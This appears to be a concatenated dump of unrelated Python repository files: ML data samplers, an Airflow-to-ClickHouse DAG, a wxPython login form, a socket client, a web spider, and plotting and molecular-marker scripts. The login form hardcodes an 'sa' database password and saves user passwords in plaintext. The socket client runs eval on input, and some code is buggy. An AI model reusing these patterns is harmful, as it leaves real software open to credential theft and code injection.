df16de8fde13afb83996076f20f3237465e0c52b | 2871a5c3d1e885ee72332dbd8ff2c015dbcb1200 | /NLP/TD4CL/source/samplers.py | bf3eac88e06fe3dbf3fc7bb10627c4bfd5438f1e | [
"Apache-2.0"
] | permissive | huawei-noah/noah-research | 297476299ad040552e44656541858145de72d141 | 82c49c36b76987a46dec8479793f7cf0150839c6 | refs/heads/master | 2023-08-16T19:29:25.439701 | 2023-08-14T03:11:49 | 2023-08-14T03:11:49 | 272,853,727 | 816 | 171 | null | 2023-09-12T01:28:36 | 2020-06-17T01:53:20 | Python | UTF-8 | Python | false | false | 11,207 | py | # Copyright (C) 2022. Huawei Technologies Co., Ltd. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
from torch.utils.data import Sampler
from utils import *
import math
from scipy.stats import norm
logger = logging.getLogger(__name__)
class BatchPacingSampler(Sampler):
"""
Custom Sampler to get samples based on an external pacing function
"""
def __init__(self, data, config, metric1=None, metric2=None, batch_size=None, c0=0.01,
total_steps=None, sample=False, selection=None):
# collect metric1 and metric2
self.data = data
self.batch_size = batch_size
scores = np.asarray([d[metric1] for d in data])
if (metric2 is not None) and (metric2 != ''):
self.second_scores = np.asarray([d[metric2] for d in data])
self.percentage = 1.0 if selection is None else selection
logger.info('Sorting data ...')
if metric1 in ['correctness', 'confidence']:
logger.info('Sorting from high to low ...')
indices = np.argsort(np.negative(scores)) # from high to low
print(scores[indices[0]], scores[indices[-1]])
else:
logger.info('Sorting from low to high ...')
indices = np.argsort(scores)
sorted_scores = np.sort(scores)
print(scores[indices[0]], scores[indices[-1]])
# Form batches
logger.info('Forming batches ...')
total_steps = total_steps * config['gradient_accumulation_steps']
self.batches = [[] for _ in range(total_steps)]
for train_step in range(0, total_steps):
current_competence = self.pacing_root(train_step, c0, total_steps)
fraction = int(current_competence * len(data))
selected = indices[:fraction+1]
if sample == 'bias':
weights = self.second_scores[selected]
if len(weights) < batch_size:
take = torch.multinomial(torch.from_numpy(weights), len(weights), False).numpy()
else:
take = torch.multinomial(torch.from_numpy(weights), batch_size, False).numpy()
self.batches[train_step] = selected[take].tolist()
elif sample == 'most':
weights = self.second_scores[selected]
take = np.argsort(weights)[-batch_size:]
self.batches[train_step] = selected[take].tolist()
else:
if len(selected.tolist()) < batch_size:
self.batches[train_step] = random.sample(selected.tolist(), k=len(selected.tolist()))
else:
self.batches[train_step] = random.sample(selected.tolist(), k=batch_size)
if selection:
self.data_selection()
@staticmethod
def pacing_root(step, c0, total_steps, root=2):
"""
Root function
Args:
step: Current step
c0: Initial portion of data, by default equal to 1%
total_steps: Total number of steps
root: Square root, Cubic root, etc
Returns (float): Portion of data to use
"""
return min(1, ((step * ((1 - (c0 ** root)) / total_steps)) + (c0 ** root)) ** (1/root))
def data_selection(self):
"""
Select a portion of data based on the variability metric
"""
select = math.ceil(self.percentage * len(self.data))
keep_examples = np.argsort(self.second_scores)[-select:] # take the most ambiguous
sections = math.ceil(len(keep_examples) / self.batch_size)
# Do 10 passes over this smaller dataset
for _ in range(0, 10):
ids_select = [keep_examples[i] for i in torch.randperm(len(keep_examples))] # permute/shuffle
lists = [a.tolist() for a in np.array_split(ids_select, sections)]
logger.info(
f'Remaining examples to train: {len(keep_examples)} samples --> {len(lists)} batches formed')
self.batches.extend(lists)
def __iter__(self):
return iter(self.batches[i] for i in range(len(self.batches)))
def __len__(self):
return len(self.batches)
class BatchShardingSampler(Sampler):
"""
Custom Sampler to get samples based on sharding
"""
def __init__(self, data, metric1=None, metric2=None, curric=None, batch_size=None, sample=False, selection=None):
self.data = data
self.batch_size = batch_size
self.percentage = 1.0 if selection is None else selection
self.batches = []
# sort based on metric
logger.info('Sorting data ...')
self.scores = np.asarray([d[metric1] for d in data])
if metric2 is not None:
self.second_scores = np.asarray([d[metric2] for d in data])
if metric1 == 'correctness': # Sort from high to low
self.rev = True
logger.info('Sorting from high to low ...')
else:
self.rev = False
logger.info('Sorting from low to high ...')
# Form batches (train one shard for 1 epoch)
logger.info('Forming batches ...')
if 'one-pass' in curric:
self.one_step()
elif 'baby-step' in curric:
self.baby_step_cumsum()
elif 'annealing' in curric:
self.baby_step_annealing(sample=sample)
else:
print('Wrong curriculum')
exit(0)
if selection:
self.data_selection()
def extend_batches(self, shard_id, available_ins):
"""
Using the available examples: shuffle them and split them into batches
Args:
shard_id (int): Shard ID
available_ins (list): Indices we can use (indexes)
Returns: Extended batch list
"""
sections = math.ceil(len(available_ins) / self.batch_size)
ids_select = [available_ins[i] for i in torch.randperm(len(available_ins))] # permute/shuffle
lists = [a.tolist() for a in np.array_split(ids_select, sections)]
logger.info(f'Shard {shard_id} contains {len(available_ins)} samples --> {len(lists)} batches formed')
self.batches.extend(lists)
def one_step(self):
"""
One-pass: Use only current shard in the current step
"""
unique_shards = list(set(self.scores))
for num, i in enumerate(sorted(unique_shards, reverse=self.rev)):
idx = np.where(self.scores == i)[0].tolist() # elements with correctness == i
self.extend_batches(num, idx)
def baby_step_cumsum(self):
"""
Cumulative Step: Accumulate all previous shard + current in the current phase
"""
unique_shards = list(set(self.scores))
valid_samples = []
for num, i in enumerate(sorted(unique_shards, reverse=self.rev)):
idx = np.where(self.scores == i)[0].tolist() # current shard
valid_samples.extend(idx)
self.extend_batches(num, valid_samples)
def baby_step_annealing(self, sample=False):
"""
Annealing: Select 1/N from each previous shard in the current phase
"""
unique_shards = list(set(self.scores))
seen_shards = [] # list of lists
for num, i in enumerate(sorted(unique_shards, reverse=self.rev)):
valid_samples = []
idx = np.where(self.scores == i)[0].tolist()
seen_shards.append(idx)
if num == 0: # 1st shard
valid_samples.extend(idx)
else:
valid_samples.extend(idx)
if sample == 'bias':
for k, shard in enumerate(seen_shards[:-1]):
select = (math.ceil(len(shard) / len(unique_shards)))
vals = torch.multinomial(torch.from_numpy(self.second_scores[shard]), select, False).numpy()
valid_samples.extend((np.array(shard)[vals]).tolist())
elif sample == 'most':
for k, shard in enumerate(seen_shards[:-1]):
select = (math.ceil(len(shard) / len(unique_shards)))
vals = np.argsort(self.second_scores[shard])[-select:]
valid_samples.extend((np.array(shard)[vals]).tolist())
else:
for k, shard in enumerate(seen_shards[:-1]):
select = (math.ceil(len(shard) / len(unique_shards)))
rand_select = random.sample(shard, k=select)
valid_samples.extend(rand_select)
self.extend_batches(num, valid_samples)
def baby_step_cumsum_random(self):
"""
Same as Baby Step but put random examples inside each shard (sanity check)
"""
unique_shards = list(set(self.scores))
shard_size = []
for num, i in enumerate(sorted(unique_shards, reverse=self.rev)):
idx = np.where(self.scores == i)[0].tolist() # current shard
shard_size.append(len(idx))
indices = np.arange(len(self.scores))
indices = np.random.permutation(indices)
indices = np.split(indices, np.cumsum(shard_size)[:-1])
valid_samples = []
for num, ind in enumerate(indices):
valid_samples.extend(ind.tolist())
self.extend_batches(num, valid_samples)
def data_selection(self):
"""
Select a portion of data based on the variability metric
"""
select = math.ceil(self.percentage * len(self.data))
keep_examples = np.argsort(self.second_scores)[-select:] # take the most ambiguous
sections = math.ceil(len(keep_examples) / self.batch_size)
# Do 10 passes over this smaller dataset
for _ in range(0, 10):
ids_select = [keep_examples[i] for i in torch.randperm(len(keep_examples))] # permute/shuffle
lists = [a.tolist() for a in np.array_split(ids_select, sections)]
logger.info(
f'Remaining examples to train: {len(keep_examples)} samples --> {len(lists)} batches formed')
self.batches.extend(lists)
def __iter__(self):
return iter(self.batches[i] for i in range(len(self.batches)))
def __len__(self):
return len(self.batches)
| [
"[email protected]"
] | |
53301a5116e33fea984ff880ca09ade5f496c85a | 071fa14cc6de2e8f1dd738143364fcd5e1a7ba44 | /dags/clickhouseLogging.py | 38ea68dc0b01e4693e98e9fd2eabb418375ea537 | [] | no_license | UrcaDeLima/tmpAirflow | 1f35a542afeae54ef1ad619a4c53ea07ffe30afb | 7f8d70707412bf636dfc68dc34b55ac05b61c566 | refs/heads/master | 2023-03-20T10:47:09.040207 | 2021-03-10T08:58:23 | 2021-03-10T08:58:23 | 344,136,563 | 0 | 0 | null | 2021-03-10T09:05:00 | 2021-03-03T13:29:58 | Python | UTF-8 | Python | false | false | 1,482 | py | from datetime import datetime, timedelta
from airflow import DAG
from airflow.hooks.postgres_hook import PostgresHook
from airflow.operators.dummy_operator import DummyOperator
from airflow.operators.python_operator import PythonOperator
from clickhouse_driver.client import Client
import os
from dotenv import load_dotenv
load_dotenv()
default_args = {
'owner': 'airflow',
'depends_on_past': False,
'start_date': datetime(2021, 3, 9),
'retries': 3,
'retry_delay': timedelta(minutes=1),
}
def get_activated_sources():
DB_HOST = os.getenv('DB_HOST')
PATH_LOG_FILE = os.getenv('PATH_LOG_FILE')
client = Client(f'{DB_HOST}')
print(client.execute("DROP TABLE IF EXISTS admin_backend_logs.logs"))
os.system(f'time clickhouse-client --query="INSERT INTO admin_backend_logs.logs_tmp FORMAT CSV" < {PATH_LOG_FILE}')
print(client.execute("CREATE TABLE admin_backend_logs.logs ENGINE = ReplacingMergeTree(day, (date), 8192) AS SELECT DISTINCT toDate(date) AS day, date, method, originalUrl, statusCode, contentType, userAgent, ip, userId FROM admin_backend_logs.logs_tmp;"))
return 1
with DAG('admin_backend_logs_dag',
default_args=default_args,
schedule_interval=timedelta (days = 1),
catchup=False) as dag:
start_task = DummyOperator(task_id='start_task')
discharge_task = PythonOperator(task_id='discharge_task', python_callable=get_activated_sources)
start_task >> discharge_task | [
"[email protected]"
] | |
ca34b119da814e13ade74c3a97267f176517ebd1 | 9c342cc31c1591cc9005a29f83ce742fe56143f1 | /LinkStone.py | 0a9ff7bb0c461f8a5ca788354b9a68c758b02986 | [] | no_license | Winsy412/LinkStoneManager | c5236a7f755a633d63ea3b7988aa3249121467f4 | 7f39202c0b4f3bec42c9b89c91b7887d8adc4333 | refs/heads/master | 2022-03-30T06:07:54.235232 | 2019-12-31T08:58:20 | 2019-12-31T08:58:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,517 | py | #coding=utf-8
import LinkStoneLogin
import wx
import os
import pymssql
import win32api, win32gui
class LoginFrame(LinkStoneLogin.MyFrame1):
def __init__(self,parent):
LinkStoneLogin.MyFrame1.__init__(self,parent)
def check_login(self,event):
Login_user=self.User_text.GetValue()
Login_password=self.Password_text.GetValue()
with open('Config.Painter','w') as f:
f.write(Login_user)
f.write('#')
f.write(Login_password)
f.close()
#print(Login_user,Login_password)
user=[]
pawd=[]
connect = pymssql.connect('(local)','sa','123456','LinkStone')
cursor=connect.cursor()
cursor.execute("select * from PermissionBy")
row=cursor.fetchone()
while row:
#print('%s\t%s'%(row[0],row[1]))
user.append(row[0].strip())
pawd.append(row[1].strip())
row=cursor.fetchone()
if Login_user in user and Login_password in pawd:
cursor.execute("select Permission from Permissionlist where StudentNo='%s'"%(Login_user))
row=cursor.fetchone()
if '3' in str(row[0]).strip():
os.system('start python LinkStoneGSPanal.py')
if '1' in str(row[0]).strip():
os.system('start python LinkStonePermissonPanal.py')
if '2' in str(row[0]).strip():
os.system('start python LinkStonePermissonPanal.py')
if '4' in str(row[0]).strip():
os.system('start python LinkStoneSign.py')
#os.system('start calc')
#print(str(row[0]).strip())
cursor.close()
connect.close()
exit()
else:
os.system('start python LinkStoneDig.py')
cursor.close()
connect.close()
def Check_Password(self,event):
with open('Config.Painter','r') as f:
readlines=f.readlines()
#for readline in readlines:
readline=readlines[0].split('#')
self.User_text.SetValue(readline[0])
self.Password_text.SetValue(readline[1])
def main():
ct = win32api.GetConsoleTitle()
hd = win32gui.FindWindow(0,ct)
win32gui.ShowWindow(hd,0)
app = wx.App(False)
frame = LoginFrame(None)
frame.Show(True)
app.MainLoop()
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
4c3bbcd729bb5036ba4a526f3f0df9ef9e40bbc2 | a0826ddc42f4b507f3936f030774cfcd17dcdcbd | /networking/socket client.py | 26a2cb9ce818dad5d4698276dfed0b48f407bcd2 | [] | no_license | gurunadh4b/python_pat | d34f1548d27fe5bd5d90e3942696bd39753be49f | 7118119e0fdda4863ae659d9db505762ca1b9ee9 | refs/heads/master | 2020-03-07T10:23:11.665292 | 2018-03-30T14:59:21 | 2018-03-30T14:59:21 | 127,430,403 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 311 | py | import socket
s=socket.socket()
print('starting client...')
print('connection to the server')
s.connect((localhost,2000))
while True:
msg=eval(input('enter your message to server :'))
s.send(msg)
res=s.recv(1025)
print(res)
if res=='bye':
s.send('Thank you')
break
s.close()
| [
"[email protected]"
] | |
8d2c5727f6def127133d45a142686b6329b53bec | 61b81cd77cb4916262d046731edf137b919e56a8 | /baike_spider/html_parser.py | bdfc23bede46569548f68d8ed2ac40cf58ff4790 | [] | no_license | thankinglove/python_study | cd94f4d585b75abb1c88d111dbfe50fe49984989 | 875697fb0fe2edc0517297608299dc58c1d3aa1f | refs/heads/master | 2022-11-20T02:07:00.854649 | 2019-03-13T09:40:27 | 2019-03-13T09:40:27 | 150,699,215 | 0 | 1 | null | 2022-10-27T07:42:05 | 2018-09-28T07:01:56 | Python | UTF-8 | Python | false | false | 1,245 | py | import re
from bs4 import BeautifulSoup
from urllib import parse
class HtmlParser(object):
def parse(self, page_url, html_cont):
if page_url is None or html_cont is None:
return
soup = BeautifulSoup(html_cont, 'html.parser', from_encoding='utf-8')
new_urls = self._get_new_urls(page_url, soup)
new_data = self._get_new_data(page_url, soup)
return new_urls, new_data
def _get_new_urls(self, page_url, soup):
new_urls = set()
links = soup.find_all('a', href=re.compile(r'/view/\d+\.htm'))
for link in links:
new_url = link['href']
new_full_url = parse.urljoin(page_url, new_url)
new_urls.add(new_full_url)
return new_urls
def _get_new_data(self, page_url, soup):
res_data = {}
# url
res_data['url'] = page_url
# <dd class="lemmaWgt-lemmaTitle-title"> <h1>Python</h1>
title_node = soup.find('dd', class_='lemmaWgt-lemmaTitle-title').find('h1')
res_data['title'] = title_node.get_text()
# <div class="lemma-summary">
summary_node = soup.find('div', class_='lemma-summary')
res_data['summary'] = title_node.get_text()
return res_data | [
"[email protected]"
] | |
d1088c25c093a855db9e97853b75ee2340976eb5 | 0450bc5a23c60c74ae33216690c649cf86e5edaa | /exp/visual/visual_ice_density/visual_ic0_grid.py | edd073928c619c0c54085b4c6fc4d4fb4c65e8bf | [] | no_license | whiteking64/thesis | 4e66939bafcafb5a1486edcbdfad5c81d88c91b7 | f8fd58c1695bdd56bc15265147f6d940e9b3fbbd | refs/heads/master | 2021-09-06T20:32:53.050720 | 2018-02-11T07:32:03 | 2018-02-11T07:32:03 | 109,417,515 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 992 | py | import numpy as np
from mpl_toolkits.basemap import Basemap
import matplotlib.pyplot as plt
import pandas as pd
coverage = np.array([[45.0,35.64],[-45.0,35.64],[135.0,35.64],[-135.0,35.64]])
#############################################################################
m = Basemap(lon_0=180,boundinglat=40,
resolution='l',projection='npstere')
fig=plt.figure(figsize=(10,10))
#m.drawmapboundary(fill_color='aqua')
#m.fillcontinents(color='#cc9955', lake_color='aqua', zorder = 0)
m.drawcoastlines(color = '0.15')
lons = coverage[:,0]
lats = coverage[:,1]
#lons,latの段階で何度ずらして作成するのもあり
x,y = m(lons,lats)
"""
x: [ 1315178.9078919 10568199.85683821 1315178.90789189 10568199.8568382 ]
y: [ 10568199.8568382 10568199.85683819 1315178.90789189 1315178.90789189]
"""
x = np.linspace(min(x), max(x), 900)
y = np.linspace(min(y), max(y), 900)
#x,y = np.meshgrid(x, y)
x = x[:]
y = y[:3]
m.plot(x,y,'bo', markersize=10)
plt.show()
| [
"[email protected]"
] | |
42b9ce1858b8ef0c192bd4d772573a470f2f912f | 711756b796d68035dc6a39060515200d1d37a274 | /output_exocyst/optimized_43734.py | f21d43dcee9c4cba778a9cac9856ff5e9f0ec399 | [] | no_license | batxes/exocyst_scripts | 8b109c279c93dd68c1d55ed64ad3cca93e3c95ca | a6c487d5053b9b67db22c59865e4ef2417e53030 | refs/heads/master | 2020-06-16T20:16:24.840725 | 2016-11-30T16:23:16 | 2016-11-30T16:23:16 | 75,075,164 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,505 | py | import _surface
import chimera
try:
import chimera.runCommand
except:
pass
from VolumePath import markerset as ms
try:
from VolumePath import Marker_Set, Link
new_marker_set=Marker_Set
except:
from VolumePath import volume_path_dialog
d= volume_path_dialog(True)
new_marker_set= d.new_marker_set
marker_sets={}
surf_sets={}
if "Sec3_GFPN" not in marker_sets:
s=new_marker_set('Sec3_GFPN')
marker_sets["Sec3_GFPN"]=s
s= marker_sets["Sec3_GFPN"]
mark=s.place_marker((452.25, 542.286, 492.08), (0.15, 0.4, 0.6), 18.4716)
if "Sec3_0" not in marker_sets:
s=new_marker_set('Sec3_0')
marker_sets["Sec3_0"]=s
s= marker_sets["Sec3_0"]
mark=s.place_marker((469.268, 535.563, 514.149), (0.21, 0.49, 0.72), 17.1475)
if "Sec3_1" not in marker_sets:
s=new_marker_set('Sec3_1')
marker_sets["Sec3_1"]=s
s= marker_sets["Sec3_1"]
mark=s.place_marker((498.823, 524.952, 516.224), (0.21, 0.49, 0.72), 17.1475)
if "Sec3_2" not in marker_sets:
s=new_marker_set('Sec3_2')
marker_sets["Sec3_2"]=s
s= marker_sets["Sec3_2"]
mark=s.place_marker((503.123, 499.822, 497.789), (0.21, 0.49, 0.72), 17.1475)
if "Sec3_3" not in marker_sets:
s=new_marker_set('Sec3_3')
marker_sets["Sec3_3"]=s
s= marker_sets["Sec3_3"]
mark=s.place_marker((488.774, 476.446, 491.572), (0.21, 0.49, 0.72), 17.1475)
if "Sec3_4" not in marker_sets:
s=new_marker_set('Sec3_4')
marker_sets["Sec3_4"]=s
s= marker_sets["Sec3_4"]
mark=s.place_marker((464.14, 462.995, 493.548), (0.21, 0.49, 0.72), 17.1475)
if "Sec3_5" not in marker_sets:
s=new_marker_set('Sec3_5')
marker_sets["Sec3_5"]=s
s= marker_sets["Sec3_5"]
mark=s.place_marker((453.708, 439.825, 505.604), (0.21, 0.49, 0.72), 17.1475)
if "Sec3_6" not in marker_sets:
s=new_marker_set('Sec3_6')
marker_sets["Sec3_6"]=s
s= marker_sets["Sec3_6"]
mark=s.place_marker((459.656, 412.369, 506.82), (0.21, 0.49, 0.72), 17.1475)
if "Sec3_GFPC" not in marker_sets:
s=new_marker_set('Sec3_GFPC')
marker_sets["Sec3_GFPC"]=s
s= marker_sets["Sec3_GFPC"]
mark=s.place_marker((422.307, 518.031, 526.873), (0.3, 0.6, 0.8), 18.4716)
if "Sec3_Anch" not in marker_sets:
s=new_marker_set('Sec3_Anch')
marker_sets["Sec3_Anch"]=s
s= marker_sets["Sec3_Anch"]
mark=s.place_marker((497.009, 306.663, 486.71), (0.3, 0.6, 0.8), 18.4716)
if "Sec5_GFPN" not in marker_sets:
s=new_marker_set('Sec5_GFPN')
marker_sets["Sec5_GFPN"]=s
s= marker_sets["Sec5_GFPN"]
mark=s.place_marker((483.096, 528.551, 497.237), (0.5, 0.3, 0.6), 18.4716)
if "Sec5_0" not in marker_sets:
s=new_marker_set('Sec5_0')
marker_sets["Sec5_0"]=s
s= marker_sets["Sec5_0"]
mark=s.place_marker((487.368, 533.617, 485.125), (0.6, 0.31, 0.64), 17.1475)
if "Sec5_1" not in marker_sets:
s=new_marker_set('Sec5_1')
marker_sets["Sec5_1"]=s
s= marker_sets["Sec5_1"]
mark=s.place_marker((500.717, 516.161, 467.604), (0.6, 0.31, 0.64), 17.1475)
if "Sec5_2" not in marker_sets:
s=new_marker_set('Sec5_2')
marker_sets["Sec5_2"]=s
s= marker_sets["Sec5_2"]
mark=s.place_marker((495.377, 489.575, 460.231), (0.6, 0.31, 0.64), 17.1475)
if "Sec5_3" not in marker_sets:
s=new_marker_set('Sec5_3')
marker_sets["Sec5_3"]=s
s= marker_sets["Sec5_3"]
mark=s.place_marker((471.827, 474.336, 461.835), (0.6, 0.31, 0.64), 17.1475)
if "Sec5_4" not in marker_sets:
s=new_marker_set('Sec5_4')
marker_sets["Sec5_4"]=s
s= marker_sets["Sec5_4"]
mark=s.place_marker((445.147, 466.008, 464.791), (0.6, 0.31, 0.64), 17.1475)
if "Sec5_5" not in marker_sets:
s=new_marker_set('Sec5_5')
marker_sets["Sec5_5"]=s
s= marker_sets["Sec5_5"]
mark=s.place_marker((420.392, 453.434, 469.096), (0.6, 0.31, 0.64), 17.1475)
if "Sec5_GFPC" not in marker_sets:
s=new_marker_set('Sec5_GFPC')
marker_sets["Sec5_GFPC"]=s
s= marker_sets["Sec5_GFPC"]
mark=s.place_marker((399.085, 485.531, 510.933), (0.7, 0.4, 0.7), 18.4716)
if "Sec6_GFPN" not in marker_sets:
s=new_marker_set('Sec6_GFPN')
marker_sets["Sec6_GFPN"]=s
s= marker_sets["Sec6_GFPN"]
mark=s.place_marker((475.139, 500.646, 549.303), (1, 1, 0), 18.4716)
if "Sec6_0" not in marker_sets:
s=new_marker_set('Sec6_0')
marker_sets["Sec6_0"]=s
s= marker_sets["Sec6_0"]
mark=s.place_marker((473.842, 501.535, 515.465), (1, 1, 0.2), 17.1475)
if "Sec6_1" not in marker_sets:
s=new_marker_set('Sec6_1')
marker_sets["Sec6_1"]=s
s= marker_sets["Sec6_1"]
mark=s.place_marker((471.393, 503.713, 480.236), (1, 1, 0.2), 17.1475)
if "Sec6_2" not in marker_sets:
s=new_marker_set('Sec6_2')
marker_sets["Sec6_2"]=s
s= marker_sets["Sec6_2"]
mark=s.place_marker((469.173, 505.958, 444.987), (1, 1, 0.2), 17.1475)
if "Sec6_3" not in marker_sets:
s=new_marker_set('Sec6_3')
marker_sets["Sec6_3"]=s
s= marker_sets["Sec6_3"]
mark=s.place_marker((465.797, 510.556, 410.791), (1, 1, 0.2), 17.1475)
if "Sec6_4" not in marker_sets:
s=new_marker_set('Sec6_4')
marker_sets["Sec6_4"]=s
s= marker_sets["Sec6_4"]
mark=s.place_marker((457.751, 514.986, 376.788), (1, 1, 0.2), 17.1475)
if "Sec6_5" not in marker_sets:
s=new_marker_set('Sec6_5')
marker_sets["Sec6_5"]=s
s= marker_sets["Sec6_5"]
mark=s.place_marker((448.092, 524.266, 344.564), (1, 1, 0.2), 17.1475)
if "Sec6_GFPC" not in marker_sets:
s=new_marker_set('Sec6_GFPC')
marker_sets["Sec6_GFPC"]=s
s= marker_sets["Sec6_GFPC"]
mark=s.place_marker((463.163, 448.151, 366.263), (1, 1, 0.4), 18.4716)
if "Sec6_Anch" not in marker_sets:
s=new_marker_set('Sec6_Anch')
marker_sets["Sec6_Anch"]=s
s= marker_sets["Sec6_Anch"]
mark=s.place_marker((423.358, 589.653, 280.3), (1, 1, 0.4), 18.4716)
if "Sec8_0" not in marker_sets:
s=new_marker_set('Sec8_0')
marker_sets["Sec8_0"]=s
s= marker_sets["Sec8_0"]
mark=s.place_marker((480.18, 468.774, 523.834), (0.65, 0.34, 0.16), 17.1475)
if "Sec8_1" not in marker_sets:
s=new_marker_set('Sec8_1')
marker_sets["Sec8_1"]=s
s= marker_sets["Sec8_1"]
mark=s.place_marker((487.445, 444.866, 510.895), (0.65, 0.34, 0.16), 17.1475)
if "Sec8_2" not in marker_sets:
s=new_marker_set('Sec8_2')
marker_sets["Sec8_2"]=s
s= marker_sets["Sec8_2"]
mark=s.place_marker((481.161, 432.139, 486.605), (0.65, 0.34, 0.16), 17.1475)
if "Sec8_3" not in marker_sets:
s=new_marker_set('Sec8_3')
marker_sets["Sec8_3"]=s
s= marker_sets["Sec8_3"]
mark=s.place_marker((461.135, 417.823, 472.99), (0.65, 0.34, 0.16), 17.1475)
if "Sec8_4" not in marker_sets:
s=new_marker_set('Sec8_4')
marker_sets["Sec8_4"]=s
s= marker_sets["Sec8_4"]
mark=s.place_marker((444.593, 395.163, 470.991), (0.65, 0.34, 0.16), 17.1475)
if "Sec8_5" not in marker_sets:
s=new_marker_set('Sec8_5')
marker_sets["Sec8_5"]=s
s= marker_sets["Sec8_5"]
mark=s.place_marker((427.718, 373.776, 477.992), (0.65, 0.34, 0.16), 17.1475)
if "Sec8_GFPC" not in marker_sets:
s=new_marker_set('Sec8_GFPC')
marker_sets["Sec8_GFPC"]=s
s= marker_sets["Sec8_GFPC"]
mark=s.place_marker((397.481, 435.285, 396.787), (0.7, 0.4, 0), 18.4716)
if "Sec8_Anch" not in marker_sets:
s=new_marker_set('Sec8_Anch')
marker_sets["Sec8_Anch"]=s
s= marker_sets["Sec8_Anch"]
mark=s.place_marker((457.766, 312.114, 559.189), (0.7, 0.4, 0), 18.4716)
if "Sec10_GFPN" not in marker_sets:
s=new_marker_set('Sec10_GFPN')
marker_sets["Sec10_GFPN"]=s
s= marker_sets["Sec10_GFPN"]
mark=s.place_marker((461.37, 459.603, 334.456), (0.2, 0.6, 0.2), 18.4716)
if "Sec10_0" not in marker_sets:
s=new_marker_set('Sec10_0')
marker_sets["Sec10_0"]=s
s= marker_sets["Sec10_0"]
mark=s.place_marker((457.816, 452.49, 338.973), (0.3, 0.69, 0.29), 17.1475)
if "Sec10_1" not in marker_sets:
s=new_marker_set('Sec10_1')
marker_sets["Sec10_1"]=s
s= marker_sets["Sec10_1"]
mark=s.place_marker((450.763, 440.282, 363.278), (0.3, 0.69, 0.29), 17.1475)
if "Sec10_2" not in marker_sets:
s=new_marker_set('Sec10_2')
marker_sets["Sec10_2"]=s
s= marker_sets["Sec10_2"]
mark=s.place_marker((429.657, 434.382, 380.863), (0.3, 0.69, 0.29), 17.1475)
if "Sec10_3" not in marker_sets:
s=new_marker_set('Sec10_3')
marker_sets["Sec10_3"]=s
s= marker_sets["Sec10_3"]
mark=s.place_marker((420.544, 466.002, 377.307), (0.3, 0.69, 0.29), 17.1475)
if "Sec10_4" not in marker_sets:
s=new_marker_set('Sec10_4')
marker_sets["Sec10_4"]=s
s= marker_sets["Sec10_4"]
mark=s.place_marker((424.041, 490.581, 390.47), (0.3, 0.69, 0.29), 17.1475)
if "Sec10_5" not in marker_sets:
s=new_marker_set('Sec10_5')
marker_sets["Sec10_5"]=s
s= marker_sets["Sec10_5"]
mark=s.place_marker((432.871, 509.758, 409.014), (0.3, 0.69, 0.29), 17.1475)
if "Sec10_GFPC" not in marker_sets:
s=new_marker_set('Sec10_GFPC')
marker_sets["Sec10_GFPC"]=s
s= marker_sets["Sec10_GFPC"]
mark=s.place_marker((321.464, 463.925, 491.214), (0.4, 0.75, 0.3), 18.4716)
if "Sec10_Anch" not in marker_sets:
s=new_marker_set('Sec10_Anch')
marker_sets["Sec10_Anch"]=s
s= marker_sets["Sec10_Anch"]
mark=s.place_marker((549.906, 554.619, 331.935), (0.4, 0.75, 0.3), 18.4716)
if "Sec15_GFPN" not in marker_sets:
s=new_marker_set('Sec15_GFPN')
marker_sets["Sec15_GFPN"]=s
s= marker_sets["Sec15_GFPN"]
mark=s.place_marker((420.639, 516.57, 430.707), (0.9, 0.5, 0.7), 18.4716)
if "Sec15_0" not in marker_sets:
s=new_marker_set('Sec15_0')
marker_sets["Sec15_0"]=s
s= marker_sets["Sec15_0"]
mark=s.place_marker((406.95, 510.81, 430.868), (0.97, 0.51, 0.75), 17.1475)
if "Sec15_1" not in marker_sets:
s=new_marker_set('Sec15_1')
marker_sets["Sec15_1"]=s
s= marker_sets["Sec15_1"]
mark=s.place_marker((394.493, 485.949, 434.907), (0.97, 0.51, 0.75), 17.1475)
if "Sec15_2" not in marker_sets:
s=new_marker_set('Sec15_2')
marker_sets["Sec15_2"]=s
s= marker_sets["Sec15_2"]
mark=s.place_marker((370.021, 481.2, 421.942), (0.97, 0.51, 0.75), 17.1475)
if "Sec15_3" not in marker_sets:
s=new_marker_set('Sec15_3')
marker_sets["Sec15_3"]=s
s= marker_sets["Sec15_3"]
mark=s.place_marker((348.838, 486.442, 404.24), (0.97, 0.51, 0.75), 17.1475)
if "Sec15_4" not in marker_sets:
s=new_marker_set('Sec15_4')
marker_sets["Sec15_4"]=s
s= marker_sets["Sec15_4"]
mark=s.place_marker((326.826, 495.014, 389.026), (0.97, 0.51, 0.75), 17.1475)
if "Sec15_5" not in marker_sets:
s=new_marker_set('Sec15_5')
marker_sets["Sec15_5"]=s
s= marker_sets["Sec15_5"]
mark=s.place_marker((312.231, 484.269, 367.553), (0.97, 0.51, 0.75), 17.1475)
if "Sec15_GFPC" not in marker_sets:
s=new_marker_set('Sec15_GFPC')
marker_sets["Sec15_GFPC"]=s
s= marker_sets["Sec15_GFPC"]
mark=s.place_marker((361.302, 417.406, 366.31), (1, 0.6, 0.8), 18.4716)
if "Sec15_Anch" not in marker_sets:
s=new_marker_set('Sec15_Anch')
marker_sets["Sec15_Anch"]=s
s= marker_sets["Sec15_Anch"]
mark=s.place_marker((263.159, 551.133, 368.797), (1, 0.6, 0.8), 18.4716)
if "Exo70_GFPN" not in marker_sets:
s=new_marker_set('Exo70_GFPN')
marker_sets["Exo70_GFPN"]=s
s= marker_sets["Exo70_GFPN"]
mark=s.place_marker((414.232, 529.538, 502.19), (0.8, 0, 0), 18.4716)
if "Exo70_0" not in marker_sets:
s=new_marker_set('Exo70_0')
marker_sets["Exo70_0"]=s
s= marker_sets["Exo70_0"]
mark=s.place_marker((421.218, 538.508, 491.876), (0.89, 0.1, 0.1), 17.1475)
if "Exo70_1" not in marker_sets:
s=new_marker_set('Exo70_1')
marker_sets["Exo70_1"]=s
s= marker_sets["Exo70_1"]
